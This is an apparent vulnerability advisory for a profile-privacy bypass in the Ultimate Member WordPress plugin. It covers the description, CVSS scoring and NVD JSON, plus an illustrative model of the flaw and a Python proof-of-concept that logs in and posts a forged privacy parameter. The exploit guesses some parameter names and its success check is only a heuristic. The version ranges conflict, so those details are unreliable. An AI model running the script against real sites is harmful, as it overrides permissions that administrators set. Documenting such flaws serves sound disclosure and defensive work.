Security Vulnerability Report
CVE-2025-14081 CVSS 4.3 MEDIUM

CVE-2025-14081

Published: 2025-12-17 19:16:02
Last Modified: 2026-04-15 00:35:42

Description

The Ultimate Member plugin for WordPress is vulnerable to Profile Privacy Setting Bypass in all versions up to, and including, 2.11.0. This is due to a flaw in the secure fields mechanism where field keys are stored in the allowed fields list before the `required_perm` check is applied during rendering. This makes it possible for authenticated attackers with Subscriber-level access to modify their profile privacy settings (e.g., setting profile to "Only me") via direct parameter manipulation, even when the administrator has explicitly disabled the option for their role.
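The ordering flaw described above, as a simplified model added here for illustration; it is not code from the Ultimate Member plugin. All names (`Field`, `build_allowlist_flawed`, `build_allowlist_fixed`, `save`, the permission string) are hypothetical, and the corrected variant shows one way to fix the ordering, not necessarily the plugin's actual patch.

```python
# Added illustration: a simplified model of a "secure fields" allowlist.
# All names are hypothetical; this is not Ultimate Member's code.
from dataclasses import dataclass
from typing import Optional

@dataclass(frozen=True)
class Field:
    key: str
    required_perm: Optional[str] = None  # capability the role needs for this field

# Constructed form: the privacy field is gated by a per-role permission.
FORM = [
    Field("first_name"),
    Field("profile_privacy", required_perm="can_make_private_profile"),
]

def build_allowlist_flawed(fields, role_perms):
    """Flawed order: the key is allowlisted before required_perm is checked."""
    allowed, rendered = set(), []
    for f in fields:
        allowed.add(f.key)  # registered unconditionally
        if f.required_perm and f.required_perm not in role_perms:
            continue  # not rendered, yet still accepted on submit
        rendered.append(f.key)
    return allowed, rendered

def build_allowlist_fixed(fields, role_perms):
    """Corrected order: only fields that pass the check are allowlisted."""
    allowed, rendered = set(), []
    for f in fields:
        if f.required_perm and f.required_perm not in role_perms:
            continue
        allowed.add(f.key)
        rendered.append(f.key)
    return allowed, rendered

def save(submitted, allowed):
    """Persist only the submitted keys present in the render-time allowlist."""
    return {k: v for k, v in submitted.items() if k in allowed}

# Constructed submission from a role with the privacy option disabled.
SUBMITTED = {"first_name": "Ann", "profile_privacy": "Only me"}
NO_PERMS = frozenset()
```

With the flawed builder the privacy field is absent from the rendered form but its value is still saved; with the corrected builder the same submission loses that key.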

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Ultimate Member Plugin < 2.11.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import re
import sys
from urllib.parse import urljoin

import requests

# CVE-2025-14081 PoC - Ultimate Member Privacy Setting Bypass
# Target: WordPress site with Ultimate Member plugin <= 2.11.0


def exploit_privacy_bypass(target_url, username, password):
    """
    Exploit for Ultimate Member Profile Privacy Setting Bypass

    Allows authenticated users with subscriber role to modify profile privacy
    even when admin has explicitly disabled this option for their role.
    """
    session = requests.Session()

    # Step 1: Authentication
    login_url = urljoin(target_url, '/wp-login.php')
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': target_url
    }
    resp = session.post(login_url, data=login_data)

    # The WordPress auth cookie name carries a per-site suffix
    # (wordpress_logged_in_<hash>), so match on the prefix, not the exact key.
    if not any(name.startswith('wordpress_logged_in')
               for name in session.cookies.get_dict()):
        print('[-] Authentication failed')
        return False
    print('[+] Authentication successful')

    # Step 2: Get WordPress nonce for the account page
    account_url = urljoin(target_url, '/account/')
    resp = session.get(account_url)

    # Extract nonce from page content (adjust regex as needed)
    nonce_match = re.search(r'name="_wpnonce" value="([a-f0-9]+)"', resp.text)
    if not nonce_match:
        print('[-] Could not extract nonce')
        return False
    nonce = nonce_match.group(1)
    print(f'[+] Extracted nonce: {nonce[:10]}...')

    # Step 3: Submit privacy setting bypass request
    # The vulnerable parameter is 'um_profile_privacy' or similar
    # Setting it to 'only_me' when admin has disabled this option
    bypass_data = {
        'um_profile_privacy': 'only_me',  # The bypassed value
        '_wpnonce': nonce,
        'action': 'um_update_profile',
        'form_id': '1'
    }
    resp = session.post(account_url, data=bypass_data)

    # Step 4: Verify the bypass was successful
    # Heuristic only: this matches any account page that mentions "privacy",
    # so a positive result still needs manual confirmation.
    resp = session.get(account_url)
    if 'only_me' in resp.text or 'privacy' in resp.text.lower():
        print('[+] Bypass successful - Privacy setting modified')
        return True
    else:
        print('[-] Bypass may have failed - Check manually')
        return False


if __name__ == '__main__':
    if len(sys.argv) < 4:
        print(f'Usage: python {sys.argv[0]} <target_url> <username> <password>')
        sys.exit(1)
    exploit_privacy_bypass(sys.argv[1], sys.argv[2], sys.argv[3])
```

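References

https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/class-account.php#L610
https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/um-actions-account.php#L322
https://plugins.trac.wordpress.org/changeset/3421362/
https://www.wordfence.com/threat-intel/vulnerabilities/id/aad57a68-c385-491f-a5a2-32906df4b52b?source=cve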

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-14081",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-17T19:16:01.543",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Ultimate Member plugin for WordPress is vulnerable to Profile Privacy Setting Bypass in all versions up to, and including, 2.11.0. This is due to a flaw in the secure fields mechanism where field keys are stored in the allowed fields list before the `required_perm` check is applied during rendering. This makes it possible for authenticated attackers with Subscriber-level access to modify their profile privacy settings (e.g., setting profile to \"Only me\") via direct parameter manipulation, even when the administrator has explicitly disabled the option for their role."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-863"}]
      }
    ],
    "references": [
      {"url": "https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/class-account.php#L610", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/um-actions-account.php#L322", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/changeset/3421362/", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/aad57a68-c385-491f-a5a2-32906df4b52b?source=cve", "source": "[email protected]"}
    ]
  }
}
```